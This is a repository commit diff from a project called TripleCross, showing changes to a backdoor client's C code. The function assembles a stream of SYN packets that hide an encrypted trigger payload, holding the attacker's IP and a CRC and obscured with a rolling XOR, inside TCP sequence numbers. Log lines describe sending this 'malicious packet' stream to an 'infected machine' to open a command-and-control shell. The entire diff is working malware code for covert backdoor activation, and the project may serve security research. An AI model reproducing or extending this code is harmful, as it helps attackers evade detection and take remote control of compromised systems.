admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-28 04:13:08 +08:00
Code Issues Packages Projects Releases Wiki Activity

Completed new backdoor packet stream parsing for V3 backdoor using hidden payloads in TCP and IP header positions

Browse Source
This commit is contained in:
h3xduck
2022-05-09 16:36:39 -04:00
parent ba19537ec1
commit 073e1d3129
10 changed files with 2591 additions and 1814 deletions
Download Patch File Download Diff File Expand all files Collapse all files

28
src/client/client.c
View File

@@ -318,12 +318,10 @@ void activate_command_control_shell_encrypted_multi_packet(char* argv){
printf("["KBLU"INFO"RESET"]""Crafting malicious packet stream...\n");
//Stream of 3 packets, 4 bytes on each if using sequence numbers for hiding the payload
const int PAYLOAD_LEN = 12;
const int STREAM_PACKET_CAPACITY_BYTES = 4;
stream_t stream = build_standard_packet_stream_empty_payload(PAYLOAD_LEN/STREAM_PACKET_CAPACITY_BYTES, 8000, 9000, local_ip, argv);
char *payload = calloc(PAYLOAD_LEN, sizeof(char));
stream_t stream = build_standard_packet_stream_empty_payload(CC_STREAM_TRIGGER_PAYLOAD_LEN/CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES, 8000, 9000, local_ip, argv);
char *payload = calloc(CC_STREAM_TRIGGER_PAYLOAD_LEN, sizeof(char));
srand(time(NULL));
for(int ii=0; ii<PAYLOAD_LEN; ii++){
for(int ii=0; ii<CC_STREAM_TRIGGER_PAYLOAD_LEN; ii++){
payload[ii] = (char)rand();
}
inet_pton(AF_INET, argv, (void*)(payload+0x01));
@@ -337,13 +335,29 @@ void activate_command_control_shell_encrypted_multi_packet(char* argv){
strncpy(payload+0x08, result, 0x02);
uint16_t crc = crc16(payload, 10);
strncpy(payload+0x0A, (char*)&crc, 0x02);
printf("Payload before XOR: ");
for(int ii=0; ii<CC_STREAM_TRIGGER_PAYLOAD_LEN; ii++){
printf("%x ", payload[ii]);
}
printf("\n");
//Rolling xor
for(int ii=1; ii<PAYLOAD_LEN; ii++){
for(int ii=1; ii<CC_STREAM_TRIGGER_PAYLOAD_LEN; ii++){
char xor_res = payload[ii-1] ^ payload[ii];
strncpy(payload+ii, (char*)&(xor_res), 0x01);
}
stream_inject(stream, TYPE_TCP_SEQ_RAW, payload, 0x0C);
printf("Payload after XOR: ");
for(int ii=0; ii<CC_STREAM_TRIGGER_PAYLOAD_LEN; ii++){
printf("%x", payload[ii]);
}
printf("\n");
//SYN packets
for(int ii=0; ii<stream.stream_length; ii++){
set_TCP_flags(*(stream.packet_stream+ii*(sizeof(packet_t))), 0x02);
}
//Injecting payload in the stream
stream_inject(stream, TYPE_TCP_SEQ_RAW, payload, CC_STREAM_TRIGGER_PAYLOAD_LEN);
printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
//Sending the malicious stream of packets with the hidden payload